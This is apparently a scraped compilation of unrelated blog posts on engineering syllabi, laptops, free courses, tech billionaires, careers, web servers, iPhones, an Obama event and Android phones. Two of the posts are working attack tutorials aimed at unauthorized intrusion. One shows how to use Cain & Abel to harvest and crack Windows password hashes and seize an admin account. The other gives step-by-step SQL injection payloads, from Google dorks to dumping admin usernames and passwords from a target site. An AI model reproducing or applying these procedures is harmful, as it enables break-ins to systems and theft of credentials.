EngiGuide

Guys I received an email stating the teaching scheme and syllabus for 7th and 8th sem. G.T.U students.
I am posting the teaching scheme specified in the mail. I am not totally sure of it as it is not available on the G.T.U website but I suppose it is true and so I am posting it here.
The proposed teaching scheme for 7th sem. I.T. is

And the proposed teaching scheme for 8th sem.is

I again would like to specify that this is what I received in a mail and the original syllabus can probably consist of some modifications.

This is just to give you all an overview..

1. Lenovo ThinkPad X220

you may also like this post : Top 5 Laptops that Indian Engineers Love 2011
The ultraportable business notebook Lenovo ThinkPad X220 is 12.5-inch display, Intel Sandy Bridge processors (Core i3, i5 or i7), 9 Hours of battery life,optional battery, up to 8GB of DDR3 RAM, 320GB of hard drive storage.
2. Lenovo ThinkPad X201
The Lenovo ThinkPad X201 is a 12.1-inch screen ultraportable laptop with latest Intel Core i3, i5 and i7 processors, 6 hour battery life,integrated touchpad and pointing stick.

3. Lenovo ThinkPad T410

The ThinkPad T410 is a 14-inch screen portable business laptop with sleek, industrial design,and  equipped with an Intel Core i5 or Core i7 processor and optional NVIDIA switchable NVS3100M 512MB graphics.

4. HP Probook 4520s

The HP ProBook 4520s is a small and medium business notebook with Core i3, i5 and i7 processors.

5.  Dell XPS 15

The Dell XPS 15 powered with Intel Core i7 or i5 processors, ranging from 840QM to 460M, 4, 6 or 8GB shared dual-channel DDR3 memory, 9 hours battery life With 9-cell battery. Windows Ultimate, Professional or Home Premium comes with the choice.

6. Asus G73JH

This 17.3-inch monster has a Core i7 processor, 8GB of RAM, and the most powerful mobile video card available, the ATI Mobility Radeon HD 5870.

7. Lenovo ThinkPad X120e

At just under 3 lbs, the 11.6-inch Lenovo ThinkPad X120e is an 11.6-inch ultraportable netbook with Windows 7 Home Premium (32-bit) or Professional (64-bit), Option of 2GB or 4GB DDR3 SDRAM. Hard drive has 320GB of storage space at 5400rpm. Battery is 6 cell, Li-Ion, 57 Whr.

8. Dell Inspiron 15R

The Dell Inspiron 15R multimedia notebook includes a 6-cell battery that was tested to last for a maximum of 4 hours of power. Consumers can choose to purchase the optional 9-cell battery for longer mobile power. Hard drive can include up to 640GB of storage. Comes with a standard integrated graphics card or an optional ATi Radeon graphics card. Color choices include black, blue, pink or red.

9. HP Pavilion dm3t

Get a balance of performance, mobility, and affordability in a thin, sleek design. The Pavilion dm3t series is powered by Intel’s ultra-low-voltage, dual-core processors, and with 6 or more hours of battery life, these PCs have the stamina to go all day.

10. Lenovo G550

The Lenovo G550 is an update to the Value Line G530 with the primary difference being the shift from a 16:10 to a 16:9 screen. Configurations include either Intel Pentium or Core 2 Duo processor and up to 4GB DDR3 installed memory.

You might not be aware that many popular universities of the world are running free courses online .You can join these free courses and save your money There are no restrictions on this courses and any knowledge hungry person can join . Here is a list of websites providing free online education .
1. NPTEL
The National Program on Technology Enhanced Learning (NPTEL) is a Government of India sponsored collaborative educational programme . NPTEL offers free 129 courses of Engineering . In addition, 110 courses have been developed in video format, with each course comprising of approximately 40 or more one-hour lectures.
2. MIT Open CourseWare
MIT’s Open CourseWare Consortium bring together courses from 22 different universities including MIT . These courses are under tons of different subjects like Business , Economics , Architecture , Physics and Engineering . Most courses offered on OpenCourseWare are available as free audio or video lectures for free, and under open licenses.
3. WikiVersity
Wikiversity is a Wikimedia Foundation project devoted to learning resources, learning projects, and research for use in all levels from pre-school to university, including professional training and informal learning. WikiVersity is an excellent source of free text based courses . Its courses can include anything from from links to a Wikibook for that subject (which is a very well-done online textbook), courses on other sites (including some of the sites mentioned above), and online textbooks from other universities.
4. Academic Earth
Academic earth offers free online video lectures from 19 Universities such as UC Berkeley, Harvard, MIT, Princeton, Stanford etc in the subjects of Astronomy, Biology, Chemistry, Computer Science, Economics, Engineering, English, Entrepreneurship, History, Law, Mathematics, Medicine, Philosophy, Physics, Political Science, Psychology, and Religion. Its search engine also allows for specific searching—that is, instead of just searching for courses you can search for a specific topic or class .

5. TextBook Revolution
If you are a person who find it difficult to follow video lectures because either the lectures are too fast or too slow , then text based learning is best for you . Textbook Revolution provides a free textbooks which are search-able by subjects .Some of the educational material is from students and Professors across the globe .

6. iTune-U
If you’re an iPod, iPhone, or iPad user then you can study and learn anything , anywhere and anytime . iTune -U offers everything from lectures to language lessons , audiobooks to tours and you can download these lectures and take them with you .

7. Open Culture
Open Culture offers 300 free online courses from Top Universities of the world and you can download all these courses in audio , video and mp3 format .

8. Education Portal
Education Portal compiles together learning resources from different universities and schools of the world .It also offers 10 scholarship programs in a variety of subjects for students pursuing all degree levels (associate, bachelor, and graduate).

9. ArsDigita University (Aduni)
ArsDigita University also offers free video courses on various fields on science , maths and engineering .

10 Khan Academy
Khan Academy offers 1800+ videos on various educational topics . The Khan Academy also provides a web-based exercise system that generates problems for students based on skill level and performance.

1. Bill Gates

Net worth: $53 billion
Despite his net worth rising $13 billion since last year, software visionary Gates dropped in rank to the world’s second richest man, beaten by Mexican telecom mogul Carlos Slim Helu. A big reason for Gates’ larger fortune: Microsoft shares rose 50% in the last 12 months. Other investments include Four Seasons hotels, Televisa and AutoNation. Gates stepped down from day-to-day duties at Microsoft in July 2008 to focus on philanthropy at the Bill & Melinda Gates Foundation.

2. Lawrence Ellison

Net worth: $28 billion
Oracle founder’s fortune climbed $5.5 billion as his company’s shares rocketed up 70% in past 12 months. Oracle has bought 54 companies in the past five years, including the recent purchase of Sun Microsystems for $7.4 billion and BEA Systems for $8.5 billion in 2008. Ellison owns a 52% stake in business software company NetSuite; his shares are worth $480 million. The racing junkie also owns a 453-foot yacht “Rising Sun” with pal David Geffen, and won the America’s Cup in February.

3. Sergey Brin

Net worth: $17.5 billion

The Google cofounder’s hot streak brings him up a couple of rankings to 24th richest in the world. His fortune grew $5.5 billion as shares of the search giant rose 70% in past year. Google revenues hit $23.7 billion. Unveiled smart phone Nexus One in January; operates with Android software. Announced upgraded version of Chrome browser in March. Emigrated from Russia, met future partner Larry Page at Stanford; duo dropped out of computer science Ph.D. program in 1998. Brin introduced goats to Google’s campus last year, since animals are less harmful to the environment than lawn mowers.

4. Larry Page

Net worth: $17.5 billion

The surge in Google stock pushed up cofounder Page’s fortune by $5.5 billion and lands him as 24th richest. Google continues to dominate search, though it has seen Microsoft’s Bing search engine–launched in 2009–take a slice of its market share. The company has moved into mobile phones and mobile software with the January launch of its Nexus One smart phone, which uses its Android operating system software. Google Apps–including Google Docs and Google Calendar–are a $750 million piece of the overall business and growing. Page met Brin at Stanford, where the pair founded Google.

5. Azim Premji

Net worth: $17 billion

Software czar’s net worth jumped more than $11 billion in the past year, while his ranking among billionaires went from 83rd to 28th this year. Premji chairs Wipro, India’s third-largest software exporter, which reported net profits in the last two quarters, signaling a rebound for the U.S.-dependent outsourcing giant. The Azim Premji Foundation, his charitable arm, plans to set up Azim Premji University. He co-chaired the World Economic Forum’s annual meeting in Davos this year. Eldest son Rishad, a Harvard grad, is Wipro’s general manager for treasury and investor relations.

6. Steve Ballmer

Net worth: $14.5 billion

Ballmer’s net worth increased $3.5 billion in the last year, as Microsoft’s shares climbed 50%. In 2009 the manic Microsoft chief finally cut a deal with Yahoo (after failed acquisition attempts) to pay for its search technology. The company’s new operating system Windows 7, released in October 2009, was hailed as much better than predecessor Vista. The upcoming Windows Phone 7 Series mobile operating system surprised and delighted pundits. Ballmer, famous for impassioned stage antics, pretended to stomp on an iPhone at a company event last year, after an employee snapped a picture with Apple’s offending device.

7. Paul Allen

Net worth: $13.5 billion

Microsoft cofounder’s net worth rose $3 billion in the last year. Allen, who left Microsoft long ago, recently launched software outfit Xiant, whose product Filer helps users keep track of emails in Microsoft’s Outlook. Though he no longer chairs Charter Communications, which recently emerged from bankruptcy, Allen still controls 35% of voting interest in the cable outfit. The philanthropist has been diagnosed with lymphoma and is undergoing chemotherapy treatment.

8. Michael Dell

Net worth: $13.5 billion

Dell’s net worth rose $1.2 billion from a year ago, but his ranking among dropped to 37th from 25th last year. The leader of one of the world’s largest PC-makers, trying to claw its way back to the top, completed a purchase of IT services outfit Perot Systems in November 2009. Dell returned to the company helm two years ago, brought new management, restructured divisions. Dell introduced smart phone and tablet devices in the past few months. The company’s stock slipped nearly 10% in the past six months, however, and revenue fell 13% in the year ended January 2010.

9. Jeffrey Bezos

Net worth: $12.3 billion

Bezos’ fortune rose $5.5 billion in the past year, as Amazon shares climbed 100%. His rank on the billionaires list is 43rd this year, up from 68th last year. Bezos launched the Kindle digital book reader in 2007; Kindle 2 debuted in 2008. Amazon’s net income increased 40% while the economy crashed in 2009, as bargain-hunters flocked to its online marketplace for low prices and convenience. It also acquired online shoe retailer Zappos in July 2009 for $800 million in stock.

1o. Ernesto Bertarelli

Net worth: $10 billion

Net worth of this Swiss mogul rose $2.3 billion in the last year. Bertarelli inherited biotech firm Serono when his father passed away in 1998. He ran the firm for years, increasing revenue to $2.4 billion in 2006, fueled by blockbuster drug Rebif for multiple sclerosis therapy, a drug with $1.4 billion in annual sales. Bertarelli sold the company to Merck in 2007, and with his sister took home $9 billion. He launched private equity fund Area Life Sciences in 2008, investing $680 million in health care companies.

Having an idyllic career is a dream for all. For those, who are standing on the threshold of stepping into the corporate world and the ones in it, facing peer pressure to perform, a need arises to plan a career..!
You need to figure out what you want to do and find out more about what sort of training, education, and skills you will need to accomplish your career goal. Assess your skills and interests. Think vigorously about what you enjoy, what you are good at, what kind of personality you are and the values you hold.
he vital issue is to know what you actually want. For this you need to answer questions like:

• What kind of a company are you willing to work in?
• Which work culture will facilitate you to perform?
• The kind of people you want to work with? Do you want their conduct to be formal or you want to work in an exuberant environment?
• Work profile you desire? Do you aspire to be a leader or a follower? The roles and responsibilities you wish to take?
• What kind of benefits and reimbursements you want from the company?
• How strong is your emotional quotient for some not so sought-after work situations?

Answers to these questions will lead to a picture of what kind of a career you aspire for..

We all have some anticipations for our work environment. Some segments are needed to be made of our expectations on the bases of- Must Have, Don’t Want, Delightful and Entertaining wishes.

• We must have guidelines to decide which company to work with. This shall also comprise of the decision that you want to work in the same city or you can and are willing to move out of it.
• The kind of work you want to do. The designation or post you want to work at. This depends entirely on your competence in terms of your educational qualification and past experience.
• You must consider the Culture and people of the work place. We can’t amend these factors, but can choose not to work in a place where it’s not comfortable.
• The other benefits, facilities like health insurance, working hours, working from home, vacations etc. that are available, you wish for and the ones that are vital.
• Emotional analyses of one’s own self is a must! It will give you an insight to your short falls and will assist you in improvement.
• Also take into consideration what kind of fun you prefer in a work place or you just want to work and return to home! Be sure of what you decide as the second option can lead to boredom, tediousness and depression.

Finally we can say that to develop a successful career plan for yourself you need to:

1. Analyze and evaluate your interests, skills, capabilities, qualifications, and experiences if any.

2. If required, have a coach or a career counselor to objectively assess your natural talents, skills and professional strength. Compare your skills and interests with the occupations you’ve selected. The career that matches your skills, interests and personality to the closest may be the career for you.

3. Set career goals after deciding what occupation matches you. Plan yourself to meet the goals. Learn about job hunting tips as you prepare to graduate or move into the job market. Use an approach that meets your needs.

4. Create a high profile resume i.e a resume that is a strong sales tool to represent you.

5. Grab information on Industry Trends and specific companies you want to work with. Do necessary market research and company research.

6. Develop sophisticated networking capabilities.

7. Develop winning interview skills.

8. Prepare yourself for salary negotiations.

9. Use marketing techniques to get a competitive edge.

Building an ideal career is similar to building your home, with your own architecture that suits your requirements. So analyse yourself finely and choose the most conducive career or the field that complements you more than any other.

Well it is not easy to create such a list, but we have created the list on the based of our knowledge so below are the most common web server software that are widely used.
Apache Web Server

Apache HTTP Server commonly known as Apache web server is running since 1999 but in 2009 it became the first web server software to surpass the 100 million web site milestone.
It is an open source and developed by an open source community, apache is available for various operating system including Windows, Linux,MAC, Solaris and FreeBSD etc.

Microsoft’s Internet Information Services (IIS) Windows Server

Internet information services has been developed by Microsoft and it provide the facility to host a web site on windows platform, it is not from open source but you can download it trail version, it provides the powerful admin tool and integrated media platform.

Nginx Web Server

Nginx is known for its high performance, stability, rich feature set, simple configuration, and low resource consumption.It is free open source and high performance HTTP server and reverse proxy.Nginx now hosts nearly 7.65% (22.8M) of all domains worldwide.

lighttpd Web Server

X5 (Xitami) web server

X5 is web and FTP server, it is fast, small and the secure server developed by iMatix Corporation.It is free open source. It supported multiple web application protocol and was very portable. X5 was introduced in 2009.

This tutorial will cover (version 4.9.8)
INTRODUCTION
Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.
We need to accomplish the following steps to get the admin account:
1. Enumerate the computers on the network
2. connect to a computer and install the Abel remote app
3. Harvest user account information
4. Crack user account information passwords to get the admin account
5. Login to the target machine with the admin account
6. Install the Abel service on the target server
7. Harvest all of the hashes from a server and sent to the cracker
 
Once we have the admin account on the server, the rest is up to you.
 
 

First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you have multiple network cards, it might be useful to know what your MAC address is for your primary connection or the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. enter the “CMD”

4. A black window will appear

5. Enter the following information into the window without the quotes

“Ipconfig /all” and then Enter

6. Determine which one of the Ethernet adapters you are using and copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration Dialog Box. Here is a brief description of each tab and its configuration:

Sniffer Tab: allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab: Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console: This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE SECURITYPolicySecrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks.

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.)

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now <insert your name here> owned accounts.
Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Resort your hashes so single out the accounts that you have left to crack. Now select all of the un-cracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Take a second to review your progress and look for additional patterns.

At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.

Bruting

Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be extremely time consuming. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is because that is due nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8 field on how many characters to specify in the password length pull down box. Make your selection and have at it. 123749997 years to completion. If you see this, then you should rethink the need for this account. However, working with the application, rainbow tables and password generators can help your narrow down to reasonable time frames to get the job done.

Some definition

MAC: Media Access Control – In computer networking a media access control address (MAC address) is a code on most forms of networking equipment that allows for that device to be uniquely identified. Each manufacturer for Network Cards has been assigned a predefined range or block of numbers.

Sniffing: Sniffing is the act or process of “Listening” to some or all of the information that is being transmitted on the same network segment that a device is on. On an OSI Model Layer 1 network, even the most basic Sniffers are capable of “hearing” all of the traffic that is sent across a LAN. Moving to a Layer 2 network complicates the process somewhat, however tools like Cain allow for the spanning of all ports to allow the exploitation of layer 2 switched networks.

ARP: Address Resolution Protocol – Address Resolution Protocol; a TCP/IP function for associating an IP address with a link-level address. Understanding ARP and its functions and capabilities are key skills for hackers and security professionals alike. A basic understanding of ARP is necessary to properly utilize all of the functions that Cain is capable of.

Apple claims the iPhone 3G S is much faster than the iPhone 3G, but is it? Keep reading for our impromptu, unscientific speed tests.

iphone 3g vs 3gs

The iPhone 3G S may be a faster device, but the upgrade process is slow. Be prepared when you hook up the new iPhone (to the machine you previously synced your old phone with) to be asked to accept a new license agreement. You will then be asked to enter your Apple ID. Thus, you’ll need an active Internet connection. You’ll likely want to restore from your old iPhone backup and then you’ll have to wait…a very long time. My restore took about 40 minutes.
After the phone data is restored, iTunes will start restoring applications and other content you specify. Unlike previous restores, this one actually kept the icon positions on the iPhone (this may be a new 3.0 feature), but for some reason, it didn’t remember saved passwords for Wi-Fi networks.
One test I recommend running before going any further is a pixel test to confirm there are no stuck pixels on your new phone.

App Speeds

Now comes the fun part: app speed testing. I still had my old iPhone (now a glorified iPod touch!) so I could easily compare how my apps ran on the old phone with the new one. The iPhone 3G was already upgraded to 3.0 (which I recommend before switching to the 3G S), and they were both on the same network.

These are averages after three separate tests. Human error does slightly figure in, as I pressed the stopwatch on one iPhone while my assistant simultaneous pressed the icons on the new iPhone 3G S and the iPhone 3G.

• Scrabble was one of the slowest apps for us. It loaded in 14.5 seconds on the 3G S and 21.4 on the 3G.
• Next test was Rolando: 13.8 seconds on the 3G S and 21.5 on the 3G.
• Trism 3.5 seconds on 3G S and 6.3 on 3G.
• Calendar: 1.6 on 3G S and 2.1 on 3G.
• Weather Underground on Safari: 5.9 and 9.6.
• And finally TwitterFon: 1.6 on 3G S and 3.0 on 3G.

Overall impression after owing it for two hours: The iPhone 3G S is one-third to twice as fast in this blogger’s real-world test. Share your test results in the comments!

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.
Some List of Database are:
DB servers,
MySQL(Open source),

* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer

database. The name “SQL” is an abbreviation for Structured Query Language. For

historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation

“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to

interact with a database. In fact, SQL works with one specific type of database, called a

relational database.

Simple Basic Queries for SQL:

Select * from table_name :

this statement is used for showing the content of tables including column name.

For eg:

select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns):

For inserting data to table.

For eg:

insert into users(username,userid) values(“blackstar”,”black”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?

SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins

* Accessing secret data

* Modifying contents of website

* Shutting down the My SQL server

Now let’s dive into the real procedure for the SQL Injection.

Follow my steps.

Step 1: Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Here is the huge list of Google Dork

http://www.ziddu.com/download/13161874/A…t.zip.html

How to use?

copy one of the above command and paste in the google search engine box.

Hit enter.

You can get list of web sites.

We have to visit the websites one by one for checking the vulnerability.

So Start from the first website.

Note:if you like to hack particular website,then try this:

site:www.victimsite.com dork_list_commands

for eg:

site:www.victimsite.com inurl:index.php?id=

Step 2: Checking the Vulnerability:

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!

For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.

For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1

http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4

change the number until you get the error as “unknown column”

if you get the error while trying the “x”th number,then no of column is “x-1″.

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)

http://www.victimsite.com/index.php?id=2 order by 3(noerror)

http://www.victimsite.com/index.php?id=2 order by 4(noerror)

http://www.victimsite.com/index.php?id=2 order by 5(noerror)

http://www.victimsite.com/index.php?id=2 order by 6(noerror)

http://www.victimsite.com/index.php?id=2 order by 7(noerror)

http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the “–” at the end of the statement.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:

Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:

if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:

Now select 1 number.

It showing 3,7. Let’s take the Number 3.

Step 5: Finding version,database,user

Now replace the 3 from the query with “version()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name

Now we have to find the table name of the database. Replace the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the “admin ” table.

Step 7: Finding the Column Name

Now replace the “group_concat(table_name) with the “group_concat(column_name)”

Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:

First of all install the HackBar addon:

https://addons.mozilla.org/en-US/firefox/addon/3899/

Now

select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the “mysqlchar”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.

like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.

anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

For eg:

http://www.victimsite.com/index.php?id=-2

and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.

Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.

Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:

Just try with url like:

http://www.victimsite.com/admin.php

http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html

http://www.victimsite.com:2082/

etc.

If you have luck ,you will find the admin page using above urls. or try this list .

Here is the list of admin urls:

US President Barack Obama – “I’m the guy who got Mark to wear a jacket and tie” / AP Source: AP

“Don’t get frustrated and cynical about our democracy” even though “Lord knows it’s frustrating”, he pleaded at the tail end of a question-and-answer session at the social networking titan’s home base.

The President, who faces fired-up Republicans and a likely hard battle to a new four-year term, opened a frequently professorial back-and-forth by joking that he at least got Facebook’s youthful founder Mark Zuckerberg to dress up.

“My name is Barack Obama, and I’m the guy who got Mark to wear a jacket and tie,” he quipped.

“Thank you,” Mr Obama said with a chuckle as Facebook employees rewarded him with a chorus of laughter. “I’m very proud of that.”

Zuckerberg, 26, had swapped his trademark hooded sweatshirt for a jacket, shirt and tie – though his top button wasn’t closed – for the President’s unprecedented appearance.

Mr Obama notably aimed to promote his vision for reining in galloping US deficit and debt, including raising taxes on the richest Americans – including himself and Zuckerberg.

“I’m cool with that,” the Facebook founder said.

“I know you’re okay with that,” Mr Obama replied.

But Zuckerberg turned the tables on his host at the end of the session presenting him with a Facebook hoodie that Obama pronounced “beautiful” and “a high fashion statement”.

Mr Obama listed a series of his achievements, including his landmark health law and getting two women on the US Supreme Court, but warned young voters who helped win him the White House two years ago that he needed them to face challenges like the country’s debt and deficit struggles.

“I can’t do it by myself. The only way it happens is if all of you still get involved, still get engaged,” Mr Obama, whose once sky-high approval ratings have slipped to below the critical 50-per cent threshold in many polls, said.

“I know that some of you who might have been involved in the campaign or been energised back in 2008, you know, you’re frustrated that, gosh, it didn’t get done fast enough, and it seems like everybody’s bickering all the time.”

But “rather than be discouraged, I hope everybody is willing to double down and work even harder.”

The President then took questions from Facebook founder Mark Zuckerberg, his employees, and an online audience.

With polls showing two out of three Americans saying they think the country is on the wrong track, Mr Obama described young voters “regardless of your political affiliation” as the antidote to the nation’s ills.

“If you don’t give us a shove, if you don’t give the system a push, it’s just not going to change. And you’re going to be the ones who end up suffering the consequences,” he said.

“But if you are behind it, if you put the same energy and imagination that you put into Facebook into the political process, I guarantee you there’s nothing we can’t solve,” he said.

Mr Obama also mostly ducked a question about what decisions from his first two years he would now take differently.

“I’m sure I’ll make more mistakes in the next year and a half,” he said.

India has seen a flurry of Android phones launches in the recent few months. It gives the consumer lot of choice while going for an Android smartphone in the market.
Spice Mi-310: Spice Mi 310 features 2MP camera, 1200 mAh battery, Wi-Fi, HSDPA, Trackpad, aGPS, FM, and T-Flash card support upto 16 GB.  Spice has priced it at an attractive INR 7500, which will surely get a lot of budget buyers.
Price: INR 7,500
Samsung Galaxy Ace: Features include Android 2.2 Froyo, 3.5-inch HVGA TFT display, 800MHz processor, 5-megapixel autofocus camera with LED flash, Social Hub, TouchWiz interface, Swype; document viewer/editor, Quad-band GSM, HSDPA, A-GPS, Bluetooth, Wi-Fi, 150 MB Internal Memory, 1350 mAh battery and 3.5 mm headset jack
Price: INR 14,500
